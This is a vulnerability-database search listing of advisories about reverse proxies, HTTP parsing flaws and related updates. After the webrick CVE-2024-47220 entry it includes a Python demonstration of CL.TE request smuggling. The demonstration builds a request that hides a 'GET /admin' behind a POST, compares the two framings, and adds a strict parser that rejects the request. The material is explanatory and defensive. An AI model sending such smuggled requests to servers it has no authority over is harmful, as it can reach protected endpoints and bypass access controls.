Lucene search

2135 matches found

Atlassian, added 2024/09/27 12:21 a.m., 19 views

Allow HTTP Strict Transport Security (HSTS) to be configured in Bamboo 10

Issue Summary: This is reproducible on Data Center. Up until Bamboo 9.6, HTTP Strict Transport Security (https://tools.ietf.org/html/rfc6797) was configurable in Bamboo by following the steps outlined in this KB article: How do I enable HSTS and other HTTP Security Headers in Bamboo Data...

AI score 7.2; exploits 0
Kitploit, added 2024/09/24 11:30 a.m., 195 views

SafeLine - Serve As A Reverse Proxy To Protect Your Web Services From Attacks And Exploits

SafeLine is a self-hosted WAF (Web Application Firewall) to protect your web apps from attacks and exploits. A web application firewall helps protect web apps by filtering and monitoring HTTP traffic between a web application and the Internet. It typically protects web apps from attacks such as SQL...

AI score 7.5; exploits 0, references 1
RedhatCVE, added 2024/09/23 5:10 a.m., 12 views

CVE-2024-47220

A flaw was found in the webrick toolkit. This issue occurs because the server incorrectly handles requests with both Content-Length and Transfer-Encoding headers. This can allow an attacker to sneak in an extra request such as GET /admin after the normal request POST /user. As a result,...

CVSS 7.5, AI score 6.5, EPSS 0.00108; exploits 0, references 5
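The CVE-2024-47220 description above is the classic CL.TE framing ambiguity: a front end that trusts Content-Length forwards the whole body as one request, while a back end that honours Transfer-Encoding stops at the terminating zero chunk and treats the bytes after it as a second request. The following Python is an added illustration, not code from webrick, Red Hat or the advisory: it builds one constructed request carrying both headers, frames it both ways so the hidden GET /admin becomes visible, and shows the hardened alternative of rejecting the ambiguous request outright, which RFC 7230 section 3.3.3 permits (and which at minimum requires closing the connection afterwards). The host name and paths are constructed for the example.

```python
"""CL.TE request-smuggling ambiguity, demonstrated on a constructed request."""

# Constructed sample traffic: the request that rides behind POST /user.
SMUGGLED = b"GET /admin HTTP/1.1\r\nHost: example.internal\r\n\r\n"


def build_ambiguous_request(smuggled: bytes = SMUGGLED) -> bytes:
    """Build a POST carrying both Content-Length and Transfer-Encoding.

    Content-Length covers the whole body (zero chunk + smuggled request), so a
    CL-honouring front end forwards everything as one request.  A TE-honouring
    back end stops at the zero chunk and reads the rest as a second request.
    """
    body = b"0\r\n\r\n" + smuggled
    head = b"\r\n".join([
        b"POST /user HTTP/1.1",
        b"Host: example.internal",
        b"Content-Length: " + str(len(body)).encode("ascii"),
        b"Transfer-Encoding: chunked",
        b"",
        b"",
    ])
    return head + body


def parse_head(raw: bytes):
    """Split one request into (request line, {lower-case name: [values]}, rest)."""
    head, sep, rest = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("incomplete request head")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers.setdefault(name.strip().lower().decode("ascii"), []).append(
            value.strip().decode("ascii"))
    return lines[0].decode("ascii"), headers, rest


def read_chunked(rest: bytes):
    """Decode a chunked body; return (body, bytes left on the connection)."""
    body, pos = b"", 0
    while True:
        eol = rest.index(b"\r\n", pos)
        size = int(rest[pos:eol].split(b";")[0].decode("ascii"), 16)
        pos = eol + 2
        if size == 0:
            # No trailers in this example: the zero chunk is followed by CRLF.
            if rest[pos:pos + 2] != b"\r\n":
                raise ValueError("bad chunk terminator")
            return body, rest[pos + 2:]
        body += rest[pos:pos + size]
        pos += size + 2  # skip the chunk data and its trailing CRLF


def frame_by_content_length(raw: bytes):
    """Front-end behaviour: trust Content-Length, ignore Transfer-Encoding.
    Returns ([(request line, body)], leftover bytes)."""
    line, headers, rest = parse_head(raw)
    n = int(headers.get("content-length", ["0"])[0])
    return [(line, rest[:n])], rest[n:]


def frame_by_transfer_encoding(raw: bytes):
    """Back-end behaviour (what the flaw amounts to): honour chunked, ignore
    Content-Length, and keep parsing requests from whatever bytes are left."""
    requests = []
    while raw:
        line, headers, rest = parse_head(raw)
        codings = [v.lower() for v in headers.get("transfer-encoding", [])]
        if "chunked" in codings:
            body, raw = read_chunked(rest)
        else:
            n = int(headers.get("content-length", ["0"])[0])
            body, raw = rest[:n], rest[n:]
        requests.append((line, body))
    return requests


def frame_strict(raw: bytes):
    """Hardened behaviour: refuse a request that carries both headers.
    Returns ((request line, body), leftover bytes) for unambiguous requests."""
    line, headers, rest = parse_head(raw)
    if "transfer-encoding" in headers and "content-length" in headers:
        raise ValueError("400 Bad Request: Content-Length with Transfer-Encoding")
    if "transfer-encoding" in headers:
        body, leftover = read_chunked(rest)
    else:
        n = int(headers.get("content-length", ["0"])[0])
        body, leftover = rest[:n], rest[n:]
    return (line, body), leftover


if __name__ == "__main__":
    raw = build_ambiguous_request()
    print("front end sees:", [l for l, _ in frame_by_content_length(raw)[0]])
    print("back end sees: ", [l for l, _ in frame_by_transfer_encoding(raw)])
    try:
        frame_strict(raw)
    except ValueError as err:
        print("strict parser: ", err)
```

The same two framers double as a quick conformance probe: feed a server you operate a request built this way over a raw socket and see whether it answers once, twice, or with a 400. A second response for the GET means the server is the Transfer-Encoding side of a CL.TE pair and must sit behind a front end that either normalises the body or rejects the request.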
Fedora, added 2024/09/13 1:55 a.m., 11 views

[SECURITY] Fedora 40 Update: haproxy-2.9.10-1.fc40

HAProxy is a TCP/HTTP reverse proxy which is particularly suited for high availability environments. Indeed, it can: - route HTTP requests depending on statically assigned cookies - spread load among several servers while assuring server persistence through the use of HTTP cookies - switch to...

CVSS 7.5, AI score 7.1, EPSS 0.01495; exploits 0
Microsoft CVE, added 2024/09/11 7:00 a.m., 1 view

In Go before 1.15.13 and 1.16.x before 1.16.5 some configurations of ReverseProxy (from net/http/httputil) result in a situation where an attacker is able to drop arbitrary headers.

CVSS 5.3, AI score 7, EPSS 0.00039; exploits 1
Packet Storm, added 2024/09/01 12:00 a.m., 357 views

Apache Reverse Proxy Bypass Scanner

This module requires Metasploit: https://metasploit.com/download. Current source: https://github.com/rapid7/metasploit-framework. Module name: 'Apache Reverse Proxy Bypass Vulnerability Scanner'. Description: Scan for poorly configured reverse proxy servers. By default, this module...

CVSS 5, AI score 7.3, EPSS 0.76893; exploits 12
The Hacker News, added 2024/08/29 11:26 a.m., 19 views

How AitM Phishing Attacks Bypass MFA and EDR—and How to Fight Back

Attackers are increasingly using new phishing toolkits (open-source, commercial, and criminal) to execute adversary-in-the-middle (AitM) attacks. AitM enables attackers not just to harvest credentials but to steal live sessions, allowing them to bypass traditional phishing prevention controls such as MF...

AI score 7.4; exploits 0
NVD, added 2024/08/27 9:15 p.m., 19 views

CVE-2024-45049

Hydra is a Continuous Integration service for Nix based projects. It is possible to trigger evaluations in Hydra without any authentication. Depending on the size of evaluations, this can impact the availability of systems. The problem can be fixed by applying...

CVSS 7.5, EPSS 0.0036; exploits 0, references 4
Cvelist, added 2024/08/27 8:33 p.m., 21 views

CVE-2024-45049 Nix Hydra Missing authentication when triggering evaluations

Same description as the NVD record for CVE-2024-45049 above (evaluations can be triggered in Hydra without authentication, with an availability impact).

CVSS 7.5, EPSS 0.0036; exploits 0, references 4
Vulnrichment, added 2024/08/27 8:33 p.m., 14 views

CVE-2024-45049 Nix Hydra Missing authentication when triggering evaluations

Same description as the NVD record for CVE-2024-45049 above (evaluations can be triggered in Hydra without authentication, with an availability impact).

CVSS 7.5, AI score 7.5, EPSS 0.0036; exploits 0, references 4
Fedora, added 2024/08/26 2:05 a.m., 33 views

[SECURITY] Fedora 40 Update: nginx-1.26.2-1.fc40

Nginx is a web server and a reverse proxy server for HTTP, SMTP, POP3 and IMAP protocols, with a strong focus on high concurrency, performance and low memory usage...

CVSS 5.7, AI score 4.8, EPSS 0.00202; exploits 0
OpenVAS, added 2024/08/26 12:00 a.m., 18 views

Fedora: Security Advisory for nginx (FEDORA-2024-8ba5080dfa)

The remote host is missing an update for nginx (FEDORA-2024-8ba5080dfa). The rest of the extracted description is the Greenbone NASL script's license header (SPDX-FileCopyrightText: 2024 Greenbone AG; SPDX-License-Identifier: GPL-2.0-only), not advisory text...

CVSS 5.7, AI score 7, EPSS 0.00202; exploits 0, references 2
OpenVAS, added 2024/08/26 12:00 a.m., 24 views

Fedora: Security Advisory for nginx (FEDORA-2024-6ba57fd2a3)

The remote host is missing an update for nginx (FEDORA-2024-6ba57fd2a3). The rest of the extracted description is the Greenbone NASL script's license header (SPDX-FileCopyrightText: 2024 Greenbone AG; SPDX-License-Identifier: GPL-2.0-only), not advisory text...

CVSS 5.7, AI score 7, EPSS 0.00202; exploits 0, references 2
OSV, added 2024/08/23 11:08 a.m., 1 view

OESA-2024-2059 golang security update

Security Fixes: The net/http HTTP/1.1 client mishandled the case where a server responds to a request carrying an "Expect: 100-continue" header with a non-informational status (200 or higher). This mishandling could leave the client connection in an invalid state, where the next request sent on the...

CVSS 7.5, AI score 6.7, EPSS 0.01018; exploits 0, references 2
OSV, added 2024/08/22 4:39 p.m., 11 views

GHSA-QXQC-27PR-WGC8 GoAuthentik vulnerable to Insufficient Authorization for several API endpoints

Summary: Several API endpoints can be accessed by users without correct authentication/authorization. The main API endpoints affected by this: /api/v3/crypto/certificatekeypairs//viewcertificate/, /api/v3/crypto/certificatekeypairs//viewprivatekey/, /api/v3/.../usedby/. Note that all of the...

CVSS 9.1, AI score 7.5, EPSS 0.02987; exploits 0, references 5
OSV, added 2024/08/16 11:08 a.m., 2 views

OESA-2024-1979 golang security update

Same description as OESA-2024-2059 above (net/http HTTP/1.1 client mishandling of a non-informational response to an "Expect: 100-continue" request).

CVSS 7.5, AI score 6.7, EPSS 0.01018; exploits 0, references 2
OSV, added 2024/08/16 11:08 a.m., 1 view

OESA-2024-1980 golang security update

Same description as OESA-2024-2059 above (net/http HTTP/1.1 client mishandling of a non-informational response to an "Expect: 100-continue" request).

CVSS 7.5, AI score 6.7, EPSS 0.01018; exploits 0, references 2
CNNVD, added 2024/08/14 12:00 a.m., 2 views

F5 Nginx security vulnerability

F5 Nginx is a lightweight web server/reverse proxy server and email (IMAP/POP3) proxy server from F5 (USA), distributed under a BSD-like license. A security vulnerability exists in F5 Nginx, which stems from the possibility that undisclosed requests may result in increased memory resource...

CVSS 8.7, AI score 9, EPSS 0.01047; exploits 0, references 3
OSV, added 2024/08/09 11:08 a.m., 1 view

OESA-2024-1952 golang security update

Same description as OESA-2024-2059 above (net/http HTTP/1.1 client mishandling of a non-informational response to an "Expect: 100-continue" request).

CVSS 7.5, AI score 6.7, EPSS 0.01018; exploits 0, references 2
Amazon, added 2024/07/22 12:00 a.m., 1 view

Medium: golang

Issue Overview: same description as OESA-2024-2059 above (net/http HTTP/1.1 client mishandling of a non-informational response to an "Expect: 100-continue" request).

CVSS 7.5, AI score 6.8, EPSS 0.01018; exploits 0